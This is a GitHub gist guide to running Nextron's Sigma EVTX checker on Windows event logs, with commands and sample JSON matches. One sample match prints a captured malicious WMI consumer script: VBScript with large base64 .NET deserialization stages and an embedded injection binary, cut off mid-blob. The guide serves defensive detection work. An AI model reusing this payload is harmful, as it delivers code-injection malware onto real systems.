Skip to content

Instantly share code, notes, and snippets.

@Neo23x0

Neo23x0/sigma-evtx-scan.md

Last active May 12, 2024 12:09
Show Gist options
  • Save Neo23x0/9eb505a00f7ba591645a6246fa6c5246 to your computer and use it in GitHub Desktop.
Save Neo23x0/9eb505a00f7ba591645a6246fa6c5246 to your computer and use it in GitHub Desktop.
Download ZIP
Guide to Use Sigma EVTX Checker
Raw
sigma-evtx-scan.md

Guide to Use Nextron's Sigma EVTX Checker

It's a fast go-based scanner for Linux, Windows, and macOS that applies Sigma rules and outputs the matches as JSON.

Clone the Sigma Repository and cd into it

git clone https://github.com/SigmaHQ/sigma.git
cd sigma

Get the Sigma EVTX Checker

It's part of our EVTX repo in which we collect log exports for the Sigma CI pipeline tests.

The following commands downloads the version for Linux

wget https://github.com/NextronSystems/evtx-baseline/releases/latest/download/evtx-sigma-checker

Use evtx-sigma-checker-darwin for macOS and evtx-sigma-checker-win for the Windows version.

You can find the releases with the latest version for other operating systems here.

Run it on EVTX Files

Run the checker

  • with the log-source config of THOR (that's the config we use in our forensics scanner)
  • and all the Sigma rules in the ./rules/windows directory
  • and scan a directory which contains .evtx files
chmod +x evtx-sigma-checker
./evtx-sigma-checker --log-source ./tools/config/thor.yml --rule-path ./rules/windows/ --evtx-path $PATH_TO_YOUR_EVTX_FILES

Filter the Output

You can use the --rule-level flag to show only rules of a particular minimum level, e.g. --rule-level high. The default shows all matches of rules with level low and higher.

./evtx-sigma-checker --rule-level high --log-source ./tools/config/thor.yml --rule-path ./rules/windows/ --evtx-path $PATH_TO_YOUR_EVTX_FILES

The levels used in Sigma rules are:

  • informational
  • low
  • medium
  • high
  • critical

Beautify the Output

The checker prints the output as JSON into the command line. For better readability in the command line, I recommend piping the output to jq.

  • on Linux: install it with sudo apt-get install jq
  • on macOS: install it with brew install jq
  • on Windows: download it from here
./evtx-sigma-checker --log-source ./tools/config/thor.yml --rule-path ./rules/windows/ --evtx-path $PATH_TO_YOUR_EVTX_FILES | jq .

Output

The output will look like this:

{
  "RulePath": "/Users/neo/code/Workspace/sigma/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml",
  "RuleTitle": "WMI Event Consumer Created Named Pipe",
  "RuleId": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb",
  "RuleLevel": "high",
  "MatchStrings": [
    {
      "SearchIdentifier": "selection",
      "Field": "Image",
      "Offset": 24,
      "Data": "\\scrcons.exe"
    }
  ],
  "Event": "RuleName: -  EventType: CreatePipe  UtcTime: 2021-09-01 11:51:50.206  ProcessGuid: 23F1E02A-693B-612F-AD00-000000006200  ProcessId: 5140  PipeName: \\WkSvcPipeMgr_BRYN78  Image: C:\\Windows\\system32\\wbem\\scrcons.exe  Provider_Name: Microsoft-Windows-Sysmon  Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9  EventID: 17  Version: 1  Level: 4  Task: 17  Opcode: 0  Keywords: 9223372036854775808  TimeCreated_SystemTime: 1.6304971102138944e+09  EventRecordID: 1889  Execution_ProcessID: 5528  Execution_ThreadID: 2020  Channel: Microsoft-Windows-Sysmon/Operational  Computer: dc01.isengard.local  Security_UserID: S-1-5-18  EventID: 17  ",
  "File": "evtx/sysmon-blacksmith.evtx",
  "Channel": "Microsoft-Windows-Sysmon/Operational"
}
{
  "RulePath": "/Users/neo/code/Workspace/sigma/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml",
  "RuleTitle": "Suspicious Encoded Scripts in a WMI Consumer",
  "RuleId": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b",
  "RuleLevel": "high",
  "MatchStrings": [
    {
      "SearchIdentifier": "selection_destination",
      "Field": "Destination",
      "Offset": 16306,
      "Data": "V3JpdGVQcm9jZXNzTWVtb3J5"
    },
    {
      "SearchIdentifier": "selection_destination",
      "Field": "Destination",
      "Offset": 5552,
      "Data": "RoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2Rl"
    }
  ],
  "Event": "RuleName: -  EventType: WmiConsumerEvent  UtcTime: 2021-09-01 11:51:43.596  Operation: Deleted  User: ISENGARD\\Administrator  Name:  \"ScriptEventConsumer\"  Type: Script  Destination:  \"Function Base64ToStream(b,l)\r\\n  Dim enc, length, transform, ms\r\\n  Set enc = CreateObject(\\\"System.Text.ASCIIEncoding\\\")\r\\n  length = enc.GetByteCount_2(b)\r\\n  Set transform = CreateObject(\\\"System.Security.Cryptography.FromBase64Transform\\\")\r\\n  Set ms = CreateObject(\\\"System.IO.MemoryStream\\\")\r\\n  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, l\r\\n  ms.Position = 0\r\\n  Set Base64ToStream = ms\r\\nEnd Function\r\\n\r\\nDim shell\r\\nSet shell = CreateObject(\\\"WScript.Shell\\\")\r\\nDim ver\r\\nver = \\\"v4.0.30319\\\"\r\\nOn Error Resume Next\r\\nshell.RegRead \\\"HKLM\\\\SOFTWARE\\\\\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319\\\\\\\"\r\\nIf Err.Number <> 0 Then\r\\n  ver = \\\"v2.0.50727\\\"\r\\n  Err.Clear\r\\nEnd If\r\\nshell.Environment(\\\"Process\\\").Item(\\\"COMPLUS_Version\\\") = ver\r\\n\r\\nOn Error Resume Next\r\\n\r\\nDim stage_1, stage_2\r\\nstage_1 = \\\"AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAxxA8UmVzb3VyY2VEaWN0aW9uYXJ5DQogICAgICAgICAgICB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIg0KICAgICAgICAgICAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogICAgICAgICAgICB4bWxuczpzPSJjbHItbmFtZXNwYWNlOlN5c3RlbTthc3NlbWJseT1tc2NvcmxpYiINCiAgICAgICAgICAgIHhtbG5zOmM9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkNvbmZpZ3VyYXRpb247YXNzZW1ibHk9U3lzdGVtLkNvbmZpZ3VyYXRpb24iDQogICAgICAgICAgICB4bWxuczpyPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5SZWZsZWN0aW9uO2Fzc2VtYmx5PW1zY29ybGliIj4NCiAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJ0eXBlIiBPYmplY3RUeXBlPSJ7eDpUeXBlIHM6VHlwZX0iIE1ldGhvZE5hbWU9IkdldFR5cGUiPg0KICAgICAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgICAgICAgICAgICAgICAgICA8czpTdHJpbmc+U3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLkFwcFNldHRpbmdzLCBTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9zOlN0cmluZz4NCiAgICAgICAgICAgICAgICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJmaWVsZCIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSB0eXBlfSIgTWV0aG9kTmFtZT0iR2V0RmllbGQiPg0KICAgICAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgICAgICAgICAgICAgICAgICA8czpTdHJpbmc+ZGlzYWJsZUFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3JUeXBlQ2hlY2s8L3M6U3RyaW5nPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHI6QmluZGluZ0ZsYWdzPjQwPC9yOkJpbmRpbmdGbGFncz4NCiAgICAgICAgICAgICAgICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJzZXQiIE9iamVjdEluc3RhbmNlPSJ7U3RhdGljUmVzb3VyY2UgZmllbGR9IiBNZXRob2ROYW1lPSJTZXRWYWx1ZSI+DQogICAgICAgICAgICAgICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICAgICAgICAgIDxzOk9iamVjdC8+DQogICAgICAgICAgICAgICAgICAgICAgICA8czpCb29sZWFuPnRydWU8L3M6Qm9vbGVhbj4NCiAgICAgICAgICAgICAgICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJzZXRNZXRob2QiIE9iamVjdEluc3RhbmNlPSJ7eDpTdGF0aWMgYzpDb25maWd1cmF0aW9uTWFuYWdlci5BcHBTZXR0aW5nc30iIE1ldGhvZE5hbWUgPSJTZXQiPg0KICAgICAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgICAgICAgICAgICAgICAgICA8czpTdHJpbmc+bWljcm9zb2Z0OldvcmtmbG93Q29tcG9uZW50TW9kZWw6RGlzYWJsZUFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3JUeXBlQ2hlY2s8L3M6U3RyaW5nPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHM6U3RyaW5nPnRydWU8L3M6U3RyaW5nPg0KICAgICAgICAgICAgICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgICAgICAgICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KICAgICAgICAgICAgPC9SZXNvdXJjZURpY3Rpb25hcnk+Cw==\\\"\r\\nstage_2 = \\\"AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMdNAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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AYgBUYBZAYgBBgb4AoUBVoA0AYsBVoAlAYsBVoDgAosBVoDsAosBVoDgAYsBVoD4AYsBVoDPAYsBVoA+AYsBVoAKAosBVoCNAYsBVoCbAYsBBgb4AogBVoCXAI8BVoCkAI8BVoC/AY8BVoA0Ao8BVoCtAo8BVoDJAo8BVoCVAo8BVoB6Ao8BVoCyAY8BVoCmAY8BBgDVA4gBBgDhA4gBBgDNA4gBBgCaC4gBBgBGCYgBBgCPC4gBBgA5CYgBBhAAA5MBBgAkBYgBBgCJCogBBgAFAIgBBgAlAIgBBgBHAIgBBgBZAIgBBgCxAIgBBgC1AIgBBgC/BpcBBgC6CYgBBgC0CYgBBgCuCYgBBgCoCYgBBgBxB4gBBgB5B4gBBgAyDIgBBgBCDIgBBgA6DIgBBgAqDIgBBgBzCIgBBgCBCIgBBgCiCYgBBgByCogBBgDXCIgBBgDACYgBBhCrCpMBBgBZB5sBBgAGDJ4BBgDVA6EBBgDhA6EBBgDNA6QBBgAbAKQBBgAFBKEBBgCaC4gBBgBGCaEBBgA9AKEBBgCPC4gBBgA5CaEBBgBPAKEBBgCGCYgBBgCBB4gBBhDKCqcBBhC9CqcBBhCJAJMBBgCEBJsBBgCLBJsBBgCSBJsBBgCZBJsBBgCgBJsBBgCnBJsBBgCJCo8BBgCGCYgBBgCiCaEBBgCoCaEBBgCuCaEBBgC0CaEBBgC6CaEBBgDACaEBBgByCogBBgAFAJsBBgAlAJsBBgBHAJsBBgBZAJsBBgCxAJsBBgC1AJsBBgAuDJsBBgA+DJsBBgBGDJsBBgA2DJsBBgDbCJsBBgB3CJsBBgB9B5sBBgB1B5sBBgC5AJsBBgC8AJsBBgABAJsBBgAJAJsBBgApAJsBBgBLAJsBBgBdAJsBBgCTAJsBBgDLCJsBBgAWAawBBhAkCacBBgD8B5sBBgDvB5sBBgCsCJsBBgCFCJsBBgC8CJsBBgCXCJsBBgBTCKQBBgAZB6QBBgAKCLABBgAeCTgABgDfCDgABgDEBzgABgC/BzgABgBpB4UBBgBxCTgABgA1BLMBAAAAAIAAkSDRBLYBAQAAAAAAgACRIOwETAAJAAAAAACAAJEgSwTDAQsAAAAAAIAAkSCgA84BEAAAAAAAgACRIHAD1gETAAAAAACAAJEg2gvbARQAAAAAAIAAkSDrC9sBFgAAAAAAgACR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Uk9DRVNTX0NSRUFURV9USFJFQUQAUFJPQ0VTU19WTV9SRUFEAERVTU1ZVU5JT05OQU1FAFNVU1BFTkRfUkVTVU1FAFRFUk1JTkFURQBJTVBFUlNPTkFURQBQQUdFX1JFQURXUklURQBQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAFBST0NFU1NfVk1fV1JJVEUATUVNX1JFU0VSVkUAVEhSRUFEX0hJSkFDSwBUSFJFQURfQUxMAENPTlRFWFRfQUxMAENPTlRFWFRfRlVMTABDT05URVhUX0NPTlRST0wAU0VUX1RIUkVBRF9UT0tFTgBTRVRfSU5GT1JNQVRJT04AUFJPQ0VTU19RVUVSWV9JTkZPUk1BVElPTgBESVJFQ1RfSU1QRVJTT05BVElPTgBQUk9DRVNTX1ZNX09QRVJBVElPTgBDT05URVhUX0lOVEVHRVIAU0VDVVJJVFlfREVTQ1JJUFRPUgBTRUNVUklUWV9BVFRSSUJVVEVTAENPTlRFWFRfRkxBR1MAQ09OVEVYVF9FWFRFTkRFRF9SRUdJU1RFUlMAQ09OVEVYVF9ERUJVR19SRUdJU1RFUlMAQ09OVEVYVF9TRUdNRU5UUwBNRU1fQ09NTUlUAENPTlRFWFRfRkxPQVRJTkdfUE9JTlQAR0VUX0NPTlRFWFQAU0VUX0NPTlRFWFQAdmFsdWVfXwBSZWdpc3RlckFyZWEAbXNjb3JsaWIAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMAbHBUaHJlYWRJZABkd1RocmVhZElkAG5OdW1iZXJPZkJ5dGVzVG9SZWFkAGxwTnVtYmVyT2ZCeXRlc1JlYWQAU3VzcGVuZFRocmVhZABSZXN1bWVUaHJlYWQAQ3JlYXRlVGhyZWFkAGhUaHJlYWQAT3BlblRocmVhZABscE92ZXJsYXBwZWQAZGFjbERlZmF1bHRlZABBcHBlbmQAVGFnV29yZABDb250cm9sV29yZABTdGF0dXNXb3JkAHNkAGR3UGlwZU1vZGUAZHdPcGVuTW9kZQBFcnJvck9wY29kZQBUYWtlAEVudW1lcmFibGUAQ2xvc2VIYW5kbGUAaEhhbmRsZQBiSW5oZXJpdEhhbmRsZQBoYW5kbGUAUmVhZEZpbGUAV3JpdGVGaWxlAGhGaWxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBscE5hbWUAUDFIb21lAFAySG9tZQBQM0hvbWUAUDRIb21lAFA1SG9tZQBQNkhvbWUAV3JpdGVMaW5lAGJ5dGVzUGVyTGluZQBnZXRfTmV3TGluZQBDcmVhdGVOYW1lZFBpcGUAaE5hbWVkUGlwZQBDb25uZWN0TmFtZWRQaXBlAFZhbHVlVHlwZQBmbEFsbG9jYXRpb25UeXBlAFN5c3RlbS5Db3JlAENyME5weFN0YXRlAG5OdW1iZXJPZkJ5dGVzVG9Xcml0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZ